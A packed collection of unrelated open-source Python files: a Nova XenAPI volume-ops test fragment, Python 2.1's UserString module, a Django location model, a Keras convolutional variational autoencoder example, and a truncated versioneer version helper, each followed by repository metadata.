volumeops.volume_utils.purge_sr('session', 'srref')
self.mox.ReplayAll()
ops.detach_volume(
dict(driver_volume_type='iscsi', data='conn_data'),
'instance_1', 'mountpoint')
self.assertEquals(
['find_sr_from_vbd', 'destroy_vbd'], registered_calls)
def test_attach_volume_call(self):
ops = volumeops.VolumeOps('session')
self.mox.StubOutWithMock(ops, '_connect_volume')
self.mox.StubOutWithMock(volumeops.vm_utils, 'vm_ref_or_raise')
self.mox.StubOutWithMock(volumeops.volume_utils, 'get_device_number')
connection_info = dict(driver_volume_type='iscsi', data='conn_data')
volumeops.vm_utils.vm_ref_or_raise('session', 'instance_1').AndReturn(
'vmref')
volumeops.volume_utils.get_device_number('mountpoint').AndReturn(
'devnumber')
ops._connect_volume(
connection_info, 'devnumber', 'instance_1', 'vmref',
hotplug=True).AndReturn(('sruuid', 'vdiuuid'))
self.mox.ReplayAll()
ops.attach_volume(
connection_info,
'instance_1', 'mountpoint')
def test_attach_volume_no_hotplug(self):
ops = volumeops.VolumeOps('session')
self.mox.StubOutWithMock(ops, '_connect_volume')
self.mox.StubOutWithMock(volumeops.vm_utils, 'vm_ref_or_raise')
self.mox.StubOutWithMock(volumeops.volume_utils, 'get_device_number')
connection_info = dict(driver_volume_type='iscsi', data='conn_data')
volumeops.vm_utils.vm_ref_or_raise('session', 'instance_1').AndReturn(
'vmref')
volumeops.volume_utils.get_device_number('mountpoint').AndReturn(
'devnumber')
ops._connect_volume(
connection_info, 'devnumber', 'instance_1', 'vmref',
hotplug=False).AndReturn(('sruuid', 'vdiuuid'))
self.mox.ReplayAll()
ops.attach_volume(
connection_info,
'instance_1', 'mountpoint', hotplug=False)
def test_connect_volume_no_hotplug(self):
session = stubs.FakeSessionForVolumeTests('fake_uri')
ops = volumeops.VolumeOps(session)
instance_name = 'instance_1'
sr_uuid = '1'
sr_label = 'Disk-for:%s' % instance_name
sr_params = ''
sr_ref = 'sr_ref'
vdi_uuid = '2'
vdi_ref = 'vdi_ref'
vbd_ref = 'vbd_ref'
connection_data = {'vdi_uuid': vdi_uuid}
connection_info = {'data': connection_data,
'driver_volume_type': 'iscsi'}
vm_ref = 'vm_ref'
dev_number = 1
called = collections.defaultdict(bool)
def fake_call_xenapi(self, method, *args, **kwargs):
called[method] = True
self.stubs.Set(ops._session, 'call_xenapi', fake_call_xenapi)
self.mox.StubOutWithMock(volumeops.volume_utils, 'parse_sr_info')
volumeops.volume_utils.parse_sr_info(
connection_data, sr_label).AndReturn(
tuple([sr_uuid, sr_label, sr_params]))
self.mox.StubOutWithMock(
volumeops.volume_utils, 'find_sr_by_uuid')
volumeops.volume_utils.find_sr_by_uuid(session, sr_uuid).AndReturn(
None)
self.mox.StubOutWithMock(
volumeops.volume_utils, 'introduce_sr')
volumeops.volume_utils.introduce_sr(
session, sr_uuid, sr_label, sr_params).AndReturn(sr_ref)
self.mox.StubOutWithMock(volumeops.volume_utils, 'introduce_vdi')
volumeops.volume_utils.introduce_vdi(
session, sr_ref, vdi_uuid=vdi_uuid).AndReturn(vdi_ref)
self.mox.StubOutWithMock(volumeops.vm_utils, 'create_vbd')
volumeops.vm_utils.create_vbd(
session, vm_ref, vdi_ref, dev_number,
bootable=False, osvol=True).AndReturn(vbd_ref)
self.mox.ReplayAll()
ops._connect_volume(connection_info, dev_number, instance_name,
vm_ref, hotplug=False)
self.assertEquals(False, called['VBD.plug'])
def test_connect_volume(self):
session = stubs.FakeSessionForVolumeTests('fake_uri')
ops = volumeops.VolumeOps(session)
sr_uuid = '1'
sr_label = 'Disk-for:None'
sr_params = ''
sr_ref = 'sr_ref'
vdi_uuid = '2'
vdi_ref = 'vdi_ref'
vbd_ref = 'vbd_ref'
connection_data = {'vdi_uuid': vdi_uuid}
connection_info = {'data': connection_data,
'driver_volume_type': 'iscsi'}
called = collections.defaultdict(bool)
def fake_call_xenapi(self, method, *args, **kwargs):
called[method] = True
self.stubs.Set(ops._session, 'call_xenapi', fake_call_xenapi)
self.mox.StubOutWithMock(volumeops.volume_utils, 'parse_sr_info')
volumeops.volume_utils.parse_sr_info(
connection_data, sr_label).AndReturn(
tuple([sr_uuid, sr_label, sr_params]))
self.mox.StubOutWithMock(
volumeops.volume_utils, 'find_sr_by_uuid')
volumeops.volume_utils.find_sr_by_uuid(session, sr_uuid).AndReturn(
None)
self.mox.StubOutWithMock(
volumeops.volume_utils, 'introduce_sr')
volumeops.volume_utils.introduce_sr(
session, sr_uuid, sr_label, sr_params).AndReturn(sr_ref)
self.mox.StubOutWithMock(volumeops.volume_utils, 'introduce_vdi')
volumeops.volume_utils.introduce_vdi(
session, sr_ref, vdi_uuid=vdi_uuid).AndReturn(vdi_ref)
self.mox.ReplayAll()
ops.connect_volume(connection_info)
self.assertEquals(False, called['VBD.plug'])
|
sridevikoushik31/nova
|
nova/tests/virt/xenapi/test_volumeops.py
|
Python
|
apache-2.0
| 8,108
| 0
|
#!/usr/bin/env python
## vim:ts=4:et:nowrap
"""A user-defined wrapper around string objects
Note: string objects have grown methods in Python 1.6
This module requires Python 1.6 or later.
"""
from types import StringType, UnicodeType
import sys
__all__ = ["UserString","MutableString"]
class UserString:
def __init__(self, seq):
if isinstance(seq, StringType) or isinstance(seq, UnicodeType):
self.data = seq
elif isinstance(seq, UserString):
self.data = seq.data[:]
else:
self.data = str(seq)
def __str__(self): return str(self.data)
def __repr__(self): return repr(self.data)
def __int__(self): return int(self.data)
def __long__(self): return long(self.data)
def __float__(self): return float(self.data)
def __complex__(self): return complex(self.data)
def __hash__(self): return hash(self.data)
def __cmp__(self, string):
if isinstance(string, UserString):
return cmp(self.data, string.data)
else:
return cmp(self.data, string)
def __contains__(self, char):
return char in self.data
def __len__(self): return len(self.data)
def __getitem__(self, index): return self.__class__(self.data[index])
def __getslice__(self, start, end):
start = max(start, 0); end = max(end, 0)
return self.__class__(self.data[start:end])
def __add__(self, other):
if isinstance(other, UserString):
return self.__class__(self.data + other.data)
elif isinstance(other, StringType) or isinstance(other, UnicodeType):
return self.__class__(self.data + other)
else:
return self.__class__(self.data + str(other))
def __radd__(self, other):
if isinstance(other, StringType) or isinstance(other, UnicodeType):
return self.__class__(other + self.data)
else:
return self.__class__(str(other) + self.data)
def __iadd__(self, other):
if isinstance(other, UserString):
self.data += other.data
elif isinstance(other, StringType) or isinstance(other, UnicodeType):
self.data += other
else:
self.data += str(other)
return self
def __mul__(self, n):
return self.__class__(self.data*n)
__rmul__ = __mul__
def __imul__(self, n):
self.data *= n
return self
# the following methods are defined in alphabetical order:
def capitalize(self): return self.__class__(self.data.capitalize())
def center(self, width): return self.__class__(self.data.center(width))
def count(self, sub, start=0, end=sys.maxint):
return self.data.count(sub, start, end)
def encode(self, encoding=None, errors=None): # XXX improve this?
if encoding:
if errors:
return self.__class__(self.data.encode(encoding, errors))
else:
return self.__class__(self.data.encode(encoding))
else:
return self.__class__(self.data.encode())
def endswith(self, suffix, start=0, end=sys.maxint):
return self.data.endswith(suffix, start, end)
def expandtabs(self, tabsize=8):
return self.__class__(self.data.expandtabs(tabsize))
def find(self, sub, start=0, end=sys.maxint):
return self.data.find(sub, start, end)
def index(self, sub, start=0, end=sys.maxint):
return self.data.index(sub, start, end)
def isalpha(self): return self.data.isalpha()
def isalnum(self): return self.data.isalnum()
def isdecimal(self): return self.data.isdecimal()
def isdigit(self): return self.data.isdigit()
def islower(self): return self.data.islower()
def isnumeric(self): return self.data.isnumeric()
def isspace(self): return self.data.isspace()
def istitle(self): return self.data.istitle()
def isupper(self): return self.data.isupper()
def join(self, seq): return self.data.join(seq)
def ljust(self, width): return self.__class__(self.data.ljust(width))
def lower(self): return self.__class__(self.data.lower())
def lstrip(self): return self.__class__(self.data.lstrip())
def replace(self, old, new, maxsplit=-1):
return self.__class__(self.data.replace(old, new, maxsplit))
def rfind(self, sub, start=0, end=sys.maxint):
return self.data.rfind(sub, start, end)
def rindex(self, sub, start=0, end=sys.maxint):
return self.data.rindex(sub, start, end)
def rjust(self, width): return self.__class__(self.data.rjust(width))
def rstrip(self): return self.__class__(self.data.rstrip())
def split(self, sep=None, maxsplit=-1):
return self.data.split(sep, maxsplit)
def splitlines(self, keepends=0): return self.data.splitlines(keepends)
def startswith(self, prefix, start=0, end=sys.maxint):
return self.data.startswith(prefix, start, end)
def strip(self): return self.__class__(self.data.strip())
def swapcase(self): return self.__class__(self.data.swapcase())
def title(self): return self.__class__(self.data.title())
def translate(self, *args):
return self.__class__(self.data.translate(*args))
def upper(self): return self.__class__(self.data.upper())
class MutableString(UserString):
"""mutable string objects
Python strings are immutable objects. This has the advantage, that
strings may be used as dictionary keys. If this property isn't needed
and you insist on changing string values in place instead, you may cheat
and use MutableString.
But the purpose of this class is an educational one: to prevent
people from inventing their own mutable string class derived
    from UserString and then thereby forget to remove (override) the
    __hash__ method inherited from UserString. This would lead to
errors that would be very hard to track down.
A faster and better solution is to rewrite your program using lists."""
def __init__(self, string=""):
self.data = string
def __hash__(self):
raise TypeError, "unhashable type (it is mutable)"
def __setitem__(self, index, sub):
if index < 0 or index >= len(self.data): raise IndexError
self.data = self.data[:index] + sub + self.data[index+1:]
def __delitem__(self, index):
if index < 0 or index >= len(self.data): raise IndexError
self.data = self.data[:index] + self.data[index+1:]
def __setslice__(self, start, end, sub):
start = max(start, 0); end = max(end, 0)
if isinstance(sub, UserString):
self.data = self.data[:start]+sub.data+self.data[end:]
elif isinstance(sub, StringType) or isinstance(sub, UnicodeType):
self.data = self.data[:start]+sub+self.data[end:]
else:
self.data = self.data[:start]+str(sub)+self.data[end:]
def __delslice__(self, start, end):
start = max(start, 0); end = max(end, 0)
self.data = self.data[:start] + self.data[end:]
def immutable(self):
return UserString(self.data)
if __name__ == "__main__":
# execute the regression test to stdout, if called as a script:
import os
called_in_dir, called_as = os.path.split(sys.argv[0])
called_in_dir = os.path.abspath(called_in_dir)
called_as, py = os.path.splitext(called_as)
sys.path.append(os.path.join(called_in_dir, 'test'))
if '-q' in sys.argv:
import test_support
test_support.verbose = 0
__import__('test_' + called_as.lower())
|
MalloyPower/parsing-python
|
front-end/testsuite-python-lib/Python-2.1/Lib/UserString.py
|
Python
|
mit
| 7,530
| 0.00571
|
from django.contrib.auth.models import User
from django.core.urlresolvers import reverse
from django.db import models
class Location(models.Model):
    # CharField requires max_length; 255 here is an assumed value
    address = models.CharField(max_length=255, blank=True)
    latitude = models.DecimalField(max_digits=10, decimal_places=6)
    longitude = models.DecimalField(max_digits=10, decimal_places=6)
    created = models.DateTimeField(auto_now_add=True, editable=False)
    updated = models.DateTimeField(auto_now=True, editable=False)
owner = models.ForeignKey(User)
def get_absolute_url(self):
return reverse('location-detail', args=[str(self.id)])
def __str__(self):
return '{id: %d, latitude: %d, longitude: %d}' % (
self.id,
self.latitude,
self.longitude
)
class Meta:
app_label = 'locations'
get_latest_by = 'updated'
ordering = ['updated']
verbose_name = 'location'
verbose_name_plural = 'Locations'
|
derrickyoo/serve-tucson
|
serve_tucson/locations/models.py
|
Python
|
bsd-3-clause
| 956
| 0
|
'''This script demonstrates how to build a variational autoencoder
with Keras and deconvolution layers.
Reference: "Auto-Encoding Variational Bayes" https://arxiv.org/abs/1312.6114
'''
import numpy as np
import matplotlib.pyplot as plt
from scipy.stats import norm
from keras.layers import Input, Dense, Lambda, Flatten, Reshape, Layer
from keras.layers import Conv2D, Conv2DTranspose
from keras.models import Model
from keras import backend as K
from keras import metrics
from keras.datasets import mnist
# input image dimensions
img_rows, img_cols, img_chns = 28, 28, 1
# number of convolutional filters to use
filters = 64
# convolution kernel size
num_conv = 3
batch_size = 100
if K.image_data_format() == 'channels_first':
original_img_size = (img_chns, img_rows, img_cols)
else:
original_img_size = (img_rows, img_cols, img_chns)
latent_dim = 2
intermediate_dim = 128
epsilon_std = 1.0
epochs = 5
x = Input(batch_shape=(batch_size,) + original_img_size)
conv_1 = Conv2D(img_chns,
kernel_size=(2, 2),
padding='same', activation='relu')(x)
conv_2 = Conv2D(filters,
kernel_size=(2, 2),
padding='same', activation='relu',
strides=(2, 2))(conv_1)
conv_3 = Conv2D(filters,
kernel_size=num_conv,
padding='same', activation='relu',
strides=1)(conv_2)
conv_4 = Conv2D(filters,
kernel_size=num_conv,
padding='same', activation='relu',
strides=1)(conv_3)
flat = Flatten()(conv_4)
hidden = Dense(intermediate_dim, activation='relu')(flat)
z_mean = Dense(latent_dim)(hidden)
z_log_var = Dense(latent_dim)(hidden)
def sampling(args):
z_mean, z_log_var = args
epsilon = K.random_normal(shape=(batch_size, latent_dim),
mean=0., stddev=epsilon_std)
    # z_log_var is the log-variance (as in the KL term below), so the
    # standard deviation is exp(z_log_var / 2)
    return z_mean + K.exp(z_log_var / 2) * epsilon
# note that "output_shape" isn't necessary with the TensorFlow backend
# so you could write `Lambda(sampling)([z_mean, z_log_var])`
z = Lambda(sampling, output_shape=(latent_dim,))([z_mean, z_log_var])
# we instantiate these layers separately so as to reuse them later
decoder_hid = Dense(intermediate_dim, activation='relu')
decoder_upsample = Dense(filters * 14 * 14, activation='relu')
if K.image_data_format() == 'channels_first':
output_shape = (batch_size, filters, 14, 14)
else:
output_shape = (batch_size, 14, 14, filters)
decoder_reshape = Reshape(output_shape[1:])
decoder_deconv_1 = Conv2DTranspose(filters,
kernel_size=num_conv,
padding='same',
strides=1,
activation='relu')
decoder_deconv_2 = Conv2DTranspose(filters, num_conv,
padding='same',
strides=1,
activation='relu')
if K.image_data_format() == 'channels_first':
output_shape = (batch_size, filters, 29, 29)
else:
output_shape = (batch_size, 29, 29, filters)
decoder_deconv_3_upsamp = Conv2DTranspose(filters,
kernel_size=(3, 3),
strides=(2, 2),
padding='valid',
activation='relu')
decoder_mean_squash = Conv2D(img_chns,
kernel_size=2,
padding='valid',
activation='sigmoid')
hid_decoded = decoder_hid(z)
up_decoded = decoder_upsample(hid_decoded)
reshape_decoded = decoder_reshape(up_decoded)
deconv_1_decoded = decoder_deconv_1(reshape_decoded)
deconv_2_decoded = decoder_deconv_2(deconv_1_decoded)
x_decoded_relu = decoder_deconv_3_upsamp(deconv_2_decoded)
x_decoded_mean_squash = decoder_mean_squash(x_decoded_relu)
# Custom loss layer
class CustomVariationalLayer(Layer):
def __init__(self, **kwargs):
self.is_placeholder = True
super(CustomVariationalLayer, self).__init__(**kwargs)
def vae_loss(self, x, x_decoded_mean_squash):
x = K.flatten(x)
x_decoded_mean_squash = K.flatten(x_decoded_mean_squash)
xent_loss = img_rows * img_cols * metrics.binary_crossentropy(x, x_decoded_mean_squash)
kl_loss = - 0.5 * K.mean(1 + z_log_var - K.square(z_mean) - K.exp(z_log_var), axis=-1)
return K.mean(xent_loss + kl_loss)
def call(self, inputs):
x = inputs[0]
x_decoded_mean_squash = inputs[1]
loss = self.vae_loss(x, x_decoded_mean_squash)
self.add_loss(loss, inputs=inputs)
# We don't use this output.
return x
y = CustomVariationalLayer()([x, x_decoded_mean_squash])
vae = Model(x, y)
vae.compile(optimizer='rmsprop', loss=None)
vae.summary()
# train the VAE on MNIST digits
(x_train, _), (x_test, y_test) = mnist.load_data()
x_train = x_train.astype('float32') / 255.
x_train = x_train.reshape((x_train.shape[0],) + original_img_size)
x_test = x_test.astype('float32') / 255.
x_test = x_test.reshape((x_test.shape[0],) + original_img_size)
print('x_train.shape:', x_train.shape)
vae.fit(x_train,
shuffle=True,
epochs=epochs,
batch_size=batch_size,
validation_data=(x_test, x_test))
# build a model to project inputs on the latent space
encoder = Model(x, z_mean)
# display a 2D plot of the digit classes in the latent space
x_test_encoded = encoder.predict(x_test, batch_size=batch_size)
plt.figure(figsize=(6, 6))
plt.scatter(x_test_encoded[:, 0], x_test_encoded[:, 1], c=y_test)
plt.colorbar()
plt.show()
# build a digit generator that can sample from the learned distribution
decoder_input = Input(shape=(latent_dim,))
_hid_decoded = decoder_hid(decoder_input)
_up_decoded = decoder_upsample(_hid_decoded)
_reshape_decoded = decoder_reshape(_up_decoded)
_deconv_1_decoded = decoder_deconv_1(_reshape_decoded)
_deconv_2_decoded = decoder_deconv_2(_deconv_1_decoded)
_x_decoded_relu = decoder_deconv_3_upsamp(_deconv_2_decoded)
_x_decoded_mean_squash = decoder_mean_squash(_x_decoded_relu)
generator = Model(decoder_input, _x_decoded_mean_squash)
# display a 2D manifold of the digits
n = 15 # figure with 15x15 digits
digit_size = 28
figure = np.zeros((digit_size * n, digit_size * n))
# linearly spaced coordinates on the unit square were transformed through the inverse CDF (ppf) of the Gaussian
# to produce values of the latent variables z, since the prior of the latent space is Gaussian
grid_x = norm.ppf(np.linspace(0.05, 0.95, n))
grid_y = norm.ppf(np.linspace(0.05, 0.95, n))
for i, yi in enumerate(grid_x):
for j, xi in enumerate(grid_y):
z_sample = np.array([[xi, yi]])
z_sample = np.tile(z_sample, batch_size).reshape(batch_size, 2)
x_decoded = generator.predict(z_sample, batch_size=batch_size)
digit = x_decoded[0].reshape(digit_size, digit_size)
figure[i * digit_size: (i + 1) * digit_size,
j * digit_size: (j + 1) * digit_size] = digit
plt.figure(figsize=(10, 10))
plt.imshow(figure, cmap='Greys_r')
plt.show()
|
baojianzhou/DLReadingGroup
|
keras/examples/variational_autoencoder_deconv.py
|
Python
|
apache-2.0
| 7,159
| 0.000698
|
# This file helps to compute a version number in source trees obtained from
# git-archive tarball (such as those provided by githubs download-from-tag
# feature). Distribution tarballs (built by setup.py sdist) and build
# directories (produced by setup.py build) will contain a much shorter file
# that just contains the computed version number.
# This file is released into the public domain. Generated by
# versioneer-0.17 (https://github.com/warner/python-versioneer)
"""Git implementation of _version.py."""
import errno
import os
import re
import subprocess
import sys
def get_keywords():
"""Get the keywords needed to look up the version information."""
# these strings will be replaced by git during git-archive.
# setup.py/versioneer.py will grep for the variable names, so they must
# each be defined on a line of their own. _version.py will just call
# get_keywords().
git_refnames = "$Format:%d$"
git_full = "$Format:%H$"
git_date = "$Format:%ci$"
keywords = {"refnames": git_refnames, "full": git_full, "date": git_date}
return keywords
class VersioneerConfig:
"""Container for Versioneer configuration parameters."""
def get_config():
"""Create, populate and return the VersioneerConfig() object."""
# these strings are filled in when 'setup.py versioneer' creates
# _version.py
cfg = VersioneerConfig()
cfg.VCS = "git"
cfg.style = "pep440"
cfg.tag_prefix = "v"
cfg.parentdir_prefix = "None"
cfg.versionfile_source = "_version.py"
cfg.verbose = False
return cfg
class NotThisMethod(Exception):
"""Exception raised if a method is not valid for the current scenario."""
LONG_VERSION_PY = {}
HANDLERS = {}
def register_vcs_handler(vcs, method): # decorator
"""Decorator to mark a method as the handler for a particular VCS."""
def decorate(f):
"""Store f in HANDLERS[vcs][method]."""
if vcs not in HANDLERS:
HANDLERS[vcs] = {}
HANDLERS[vcs][method] = f
return f
return decorate
def run_command(commands, args, cwd=None, verbose=False, hide_stderr=False,
env=None):
"""Call the given command(s)."""
assert isinstance(commands, list)
p = None
for c in commands:
try:
dispcmd = str([c] + args)
# remember shell=False, so use git.cmd on windows, not just git
p = subprocess.Popen([c] + args, cwd=cwd, env=env,
stdout=subprocess.PIPE,
stderr=(subprocess.PIPE if hide_stderr
else None))
break
except EnvironmentError:
e = sys.exc_info()[1]
if e.errno == errno.ENOENT:
continue
if verbose:
print("unable to run %s" % dispcmd)
print(e)
return None, None
else:
if verbose:
print("unable to find command, tried %s" % (commands,))
return None, None
stdout = p.communicate()[0].strip()
if sys.version_info[0] >= 3:
stdout = stdout.decode()
if p.returncode != 0:
if verbose:
print("unable to run %s (error)" % dispcmd)
print("stdout was %s" % stdout)
return None, p.returncode
return stdout, p.returncode
def versions_from_parentdir(parentdir_prefix, root, verbose):
"""Try to determine the version from the parent directory name.
Source tarballs conventionally unpack into a directory that includes both
the project name and a version string. We will also support searching up
two directory levels for an appropriately named parent directory
"""
rootdirs = []
for i in range(3):
dirname = os.path.basename(root)
if dirname.startswith(parentdir_prefix):
return {"version": dirname[len(parentdir_prefix):],
"full-revisionid": None,
"dirty": False, "error": None, "date": None}
else:
rootdirs.append(root)
root = os.path.dirname(root) # up a level
if verbose:
print("Tried directories %s but none started with prefix %s" %
(str(rootdirs), parentdir_prefix))
raise NotThisMethod("rootdir doesn't start with parentdir_prefix")
@register_vcs_handler("git", "get_keywords")
def git_get_keywords(versionfile_abs):
"""Extract version information from the given file."""
# the code embedded in _version.py can just fetch the value of these
# keywords. When used from setup.py, we don't want to import _version.py,
# so we do it with a regexp instead. This function is not used from
# _version.py.
keywords = {}
try:
f = open(versionfile_abs, "r")
for line in f.readlines():
if line.strip().startswith("git_refnames ="):
mo = re.search(r'=\s*"(.*)"', line)
if mo:
keywords["refnames"] = mo.group(1)
if line.strip().startswith("git_full ="):
mo = re.search(r'=\s*"(.*)"', line)
if mo:
keywords["full"] = mo.group(1)
if line.strip().startswith("git_date ="):
mo = re.search(r'=\s*"(.*)"', line)
if mo:
keywords["date"] = mo.group(1)
f.close()
except EnvironmentError:
pass
return keywords
@register_vcs_handler("git", "keywords")
def git_versions_from_keywords(keywords, tag_prefix, verbose):
"""Get version information from git keywords."""
if not keywords:
raise NotThisMethod("no keywords at all, weird")
date = keywords.get("date")
if date is not None:
# git-2.2.0 added "%cI", which expands to an ISO-8601 -compliant
# datestamp. However we prefer "%ci" (which expands to an "ISO-8601
# -like" string, which we must then edit to make compliant), because
# it's been around since git-1.5.3, and it's too difficult to
# discover which version we're using, or to work around using an
# older one.
date = date.strip().replace(" ", "T", 1).replace(" ", "", 1)
refnames = keywords["refnames"].strip()
if refnames.startswith("$Format"):
if verbose:
print("keywords are unexpanded, not using")
raise NotThisMethod("unexpanded keywords, not a git-archive tarball")
refs = set([r.strip() for r in refnames.strip("()").split(",")])
# starting in git-1.8.3, tags are listed as "tag: foo-1.0" instead of
# just "foo-1.0". If we see a "tag: " prefix, prefer those.
TAG = "tag: "
tags = set([r[len(TAG):] for r in refs if r.startswith(TAG)])
if not tags:
# Either we're using git < 1.8.3, or there really are no tags. We use
# a heuristic: assume all version tags have a digit. The old git %d
# expansion behaves like git log --decorate=short and strips out the
# refs/heads/ and refs/tags/ prefixes that would let us distinguish
# between branches and tags. By ignoring refnames without digits, we
# filter out many common branch names like "release" and
# "stabilization", as well as "HEAD" and "master".
tags = set([r for r in refs if re.search(r'\d', r)])
if verbose:
print("discarding '%s', no digits" % ",".join(refs - tags))
if verbose:
print("likely tags: %s" % ",".join(sorted(tags)))
for ref in sorted(tags):
# sorting will prefer e.g. "2.0" over "2.0rc1"
if ref.startswith(tag_prefix):
r = ref[len(tag_prefix):]
if verbose:
print("picking %s" % r)
return {"version": r,
"full-revisionid": keywords["full"].strip(),
"dirty": False, "error": None,
"date": date}
# no suitable tags, so version is "0+unknown", but full hex is still there
if verbose:
print("no suitable tags, using unknown + full revision id")
return {"version": "0+unknown",
"full-revisionid": keywords["full"].strip(),
"dirty": False, "error": "no suitable tags", "date": None}
@register_vcs_handler("git", "pieces_from_vcs")
def git_pieces_from_vcs(tag_prefix, root, verbose, run_command=run_command):
"""Get version from 'git describe' in the root of the source tree.
This only gets called if the git-archive 'subst' keywords were *not*
expanded, and _version.py hasn't already been rewritten with a short
version string, meaning we're inside a checked out source tree.
"""
GITS = ["git"]
if sys.platform == "win32":
GITS = ["git.cmd", "git.exe"]
out, rc = run_command(GITS, ["rev-parse", "--git-dir"], cwd=root,
hide_stderr=True)
if rc != 0:
if verbose:
print("Directory %s not under git control" % root)
raise NotThisMethod("'git rev-parse --git-dir' returned error")
# if there is a tag matching tag_prefix, this yields TAG-NUM-gHEX[-dirty]
# if there isn't one, this yields HEX[-dirty] (no NUM)
describe_out, rc = run_command(GITS, ["describe", "--tags", "--dirty",
"--always", "--long",
"--match", "%s*" % tag_prefix],
cwd=root)
# --long was added in git-1.5.5
if describe_out is None:
raise NotThisMethod("'git describe' failed")
describe_out = describe_out.strip()
full_out, rc = run_command(GITS, ["rev-parse", "HEAD"], cwd=root)
if full_out is None:
raise NotThisMethod("'git rev-parse' failed")
full_out = full_out.strip()
pieces = {}
pieces["long"] = full_out
pieces["short"] = full_out[:7] # maybe improved later
pieces["error"] = None
# parse describe_out. It will be like TAG-NUM-gHEX[-dirty] or HEX[-dirty]
# TAG might have hyphens.
git_describe = describe_out
# look for -dirty suffix
dirty = git_describe.endswith("-dirty")
pieces["dirty"] = dirty
if dirty:
git_describe = git_describe[:git_describe.rindex("-dirty")]
# now we have TAG-NUM-gHEX or HEX
if "-" in git_describe:
# TAG-NUM-gHEX
mo = re.search(r'^(.+)-(\d+)-g([0-9a-f]+)$', git_describe)
if not mo:
# unparseable. Maybe git-describe is misbehaving?
pieces["error"] = ("unable to parse git-describe output: '%s'"
% describe_out)
return pieces
# tag
full_tag = mo.group(1)
if not full_tag.startswith(tag_prefix):
if verbose:
fmt = "tag '%s' doesn't start with prefix '%s'"
print(fmt % (full_tag, tag_prefix))
pieces["error"] = ("tag '%s' doesn't start with prefix '%s'"
% (full_tag, tag_prefix))
return pieces
pieces["closest-tag"] = full_tag[len(tag_prefix):]
# distance: number of commits since tag
pieces["distance"] = int(mo.group(2))
# commit: short hex revision ID
pieces["short"] = mo.group(3)
else:
# HEX: no tags
pieces["closest-tag"] = None
count_out, rc = run_command(GITS, ["rev-list", "HEAD", "--count"],
cwd=root)
pieces["distance"] = int(count_out) # total number of commits
# commit date: see ISO-8601 comment in git_versions_from_keywords()
date = run_command(GITS, ["show", "-s", "--format=%ci", "HEAD"],
cwd=root)[0].strip()
pieces["date"] = date.strip().replace(" ", "T", 1).replace(" ", "", 1)
return pieces
def plus_or_dot(pieces):
"""Return a + if we don't already have one, else return a ."""
if "+" in pieces.get("closest-tag", ""):
return "."
return "+"
def render_pep440(pieces):
"""Build up version string, with post-release "local version identifier".
Our goal: TAG[+DISTANCE.gHEX[.dirty]] . Note that if you
get a tagged build and then dirty it, you'll get TAG+0.gHEX.dirty
Exceptions:
1: no tags. git_describe was just HEX. 0+untagged.DISTANCE.gHEX[.dirty]
"""
if pieces["closest-tag"]:
rendered = pieces["closest-tag"]
if pieces["distance"] or pieces["dirty"]:
rendered += plus_or_dot(pieces)
rendered += "%d.g%s" % (pieces["distance"], pieces["short"])
if pieces["dirty"]:
rendered += ".dirty"
else:
# exception #1
rendered = "0+untagged.%d.g%s" % (pieces["distance"],
pieces["short"])
if pieces["dirty"]:
rendered += ".dirty"
return rendered
def render_pep440_pre(pieces):
"""TAG[.post.devDISTANCE] -- No -dirty.
Exceptions:
1: no tags. 0.post.devDISTANCE
"""
if pieces["closest-tag"]:
rendered = pieces["closest-tag"]
if pieces["distance"]:
rendered += ".post.dev%d" % pieces["distance"]
else:
# exception #1
rendered = "0.post.dev%d" % pieces["distance"]
return rendered
def render_pep440_post(pieces):
"""TAG[.postDISTANCE[.dev0]+gHEX] .
The ".dev0" means dirty. Note that .dev0 sorts backwards
(a dirty tree will appear "older" than the corresponding clean one),
but you shouldn't be releasing software with -dirty anyways.
Exceptions:
1: no tags. 0.postDISTANCE[.dev0]
"""
if pieces["closest-tag"]:
rendered = pieces["closest-tag"]
if pieces["distance"] or pieces["dirty"]:
rendered += ".post%d" % pieces["distance"]
if pieces["dirty"]:
rendered += ".dev0"
rendered += plus_or_dot(pieces)
rendered += "g%s" % pieces["short"]
else:
# exception #1
rendered = "0.post%d" % pieces["distance"]
if pieces["dirty"]:
rendered += ".dev0"
rendered += "+g%s" % pieces["short"]
return rendered
def render_pep440_old(pieces):
"""TAG[.postDISTANCE[.dev0]] .
The ".dev0" means dirty.
    Exceptions:
1: no tags. 0.postDISTANCE[.dev0]
"""
if pieces["closest-tag"]:
rendered = pieces["closest-tag"]
if pieces["distance"] or pieces["dirty"]:
rendered += ".post%d" % pieces["distance"]
if pieces["dirty"]:
rendered += ".dev0"
else:
# exception #1
rendered = "0.post%d" % pieces["distance"]
if pieces["dirty"]:
rendered += ".dev0"
return rendered
def render_git_describe(pieces):
"""TAG[-DISTANCE-gHEX][-dirty].
Like 'git describe --tags --dirty --always'.
Exceptions:
1: no tags. HEX[-dirty] (note: no 'g' prefix)
"""
if pieces["closest-tag"]:
rendered = pieces["closest-tag"]
if pieces["distance"]:
rendered += "-%d-g%s" % (pieces["distance"], pieces["short"])
else:
# exception #1
rendered = pieces["short"]
if pieces["dirty"]:
rendered += "-dirty"
return rendered
def render_git_describe_long(pieces):
"""TAG-DISTANCE-gHEX[-dirty].
    Like 'git describe --tags --dirty --always --long'.
The distance/hash is unconditional.
Exceptions:
1: no tags. HEX[-dirty] (note: no 'g' prefix)
"""
if pieces["closest-tag"]:
rendered = pieces["closest-tag"]
rendered += "-%d-g%s" % (pieces["distance"], pieces["short"])
else:
# exception #1
rendered = pieces["short"]
if pieces["dirty"]:
rendered += "-dirty"
return rendered
def render(pieces, style):
"""Render the given version pieces into the requested style."""
if pieces["error"]:
return {"version": "unknown",
"full-revisionid": pieces.get("long"),
"dirty": None,
"error": pieces["error"],
"date": None}
if not style or style == "default":
style = "pep440" # the default
if style == "pep440":
rendered = render_pep440(pieces)
elif style == "pep440-pre":
rendered = render_pep440_pre(pieces)
elif style == "pep440-post":
rendered = render_pep440_post(pieces)
elif style == "pep440-old":
rendered = render_pep440_old(pieces)
elif style == "git-describe":
rendered = render_git_describe(pieces)
elif style == "git-describe-long":
rendered = render_git_describe_long(pieces)
else:
raise ValueError("unknown style '%s'" % style)
return {"version": rendered, "full-revisionid": pieces["long"],
"dirty": pieces["dirty"], "error": None,
"date": pieces.get("date")}
def get_versions():
"""Get version information or return default if unable to do so."""
# I am in _version.py, which lives at ROOT/VERSIONFILE_SOURCE. If we have
# __file__, we can work backwards from there to the root. Some
# py2exe/bbfreeze/non-CPython implementations don't do __file__, in which
# case we can only use expanded keywords.
cfg = get_config()
verbose = cfg.verbose
try:
return git_versions_from_keywords(get_keywords(), cfg.tag_prefix,
verbose)
